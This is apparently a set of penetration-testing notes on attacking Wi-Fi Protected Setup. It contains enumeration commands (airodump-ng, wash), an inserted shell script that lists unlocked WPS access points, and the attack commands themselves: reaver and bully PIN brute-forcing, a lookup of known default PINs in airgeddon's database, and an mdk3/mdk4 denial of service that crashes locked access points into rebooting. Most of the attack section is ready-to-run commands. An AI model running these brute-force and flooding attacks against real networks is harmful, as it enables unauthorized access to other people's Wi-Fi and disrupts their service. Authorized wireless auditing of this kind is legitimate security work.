WPS
Enum:
airodump-ng
airodump-ng --wps wlan0mon
Wash
wash -i wlan0mon
BSSID Ch dBm WPS Lck Vendor ESSID
--------------------------------------------------------------------------------
00:0A:D0:97:39:6F 1 -88 2.0 No Broadcom linksys
WPS version 2.0 mandates lockout mitigations against PIN brute forcing, but in practice these may only slow down a brute-force attack. The Lck column indicates whether WPS is currently locked, in which case an attack is pointless at this time.
Wash scans the 2.4GHz band by default. To make it scan 5GHz, we can append the -5 option to the command.
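As an added example (not part of these notes), a small POSIX shell audit that parses wash-style output and lists the access points that still advertise WPS unlocked, which is the list a network owner would work through when disabling WPS. The wash report embedded below is constructed to match the column layout shown above.

```shell
#!/bin/sh
# Added example, not from the original notes: audit a saved wash report and list
# APs that still expose WPS unlocked (candidates for turning WPS off).
# The report below is constructed inline to mirror wash's column layout:
#   BSSID Ch dBm WPS Lck Vendor ESSID
WASH_SAMPLE='BSSID               Ch  dBm  WPS  Lck  Vendor    ESSID
--------------------------------------------------------------------------------
00:0A:D0:97:39:6F    1  -88  2.0  No   Broadcom  linksys
AA:BB:CC:11:22:33    6  -60  1.0  Yes  RalinkTe  guest net
AA:BB:CC:44:55:66   11  -71  2.0  No   Broadcom  office-ap'

# wps_exposed <wash-output>
# Prints "BSSID WPS-version ESSID" for every AP whose WPS is enabled and
# not locked (Lck == No). The header and separator lines are skipped and
# ESSIDs containing spaces are reassembled from the trailing fields.
wps_exposed() {
    printf '%s\n' "$1" | awk '
        /^BSSID/ || /^-+$/ { next }
        NF >= 7 && $5 == "No" {
            essid = $7
            for (i = 8; i <= NF; i++) essid = essid " " $i
            print $1, $4, essid
        }
    '
}

# count_exposed <wash-output>
# Number of unlocked WPS APs in the report (tr strips BSD wc padding).
count_exposed() {
    wps_exposed "$1" | wc -l | tr -d ' '
}

wps_exposed "$WASH_SAMPLE"
```

Feed it a real capture with `wash -i wlan0mon > report.txt` and `wps_exposed "$(cat report.txt)"`; locked APs (Lck Yes) are deliberately excluded since the lock itself shows the mitigation is active.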
Attack:
Reaver:
sudo reaver -b 34:08:04:09:3D:38 -i wlan0mon -v -k
Optionally, add the channel parameter (-c) followed by the AP's channel number.
Bully:
bully -d -v 4 -m wlan0mon
Once the PIN is recovered, we can pass it to bully for a single PIN attempt, using -B -p followed by the PIN, to recover the passphrase.
Both reaver and bully can verify a single PIN; to try an empty PIN, use -p ''.
Airgeddon:
install:
sudo apt install airgeddon
We'll use source to execute the shell script known_pins.db, which loads an associative array of known PINs (PINDB) into the current shell. We then look up the array by the first three bytes of the AP's BSSID, here "0013F7". The key is case sensitive and those three bytes must be uppercase.
source /usr/share/airgeddon/known_pins.db
echo ${PINDB["0013F7"]}
Potential issues:
Restart the attack if you see:
[!] WPS transaction failed (code: 0x03), re-trying last pin
WPS Lock
When WPS is locked, we can run a denial of service against the access point using mdk3 or its successor, mdk4. In some cases this triggers a reboot of the AP, which releases the lock.
Suitable modes are the authentication DoS, the EAPOL Start DoS, or the EAPOL Logoff flood. Multiple wireless cards may be needed to generate enough traffic to overwhelm the AP and make it crash so that it reboots.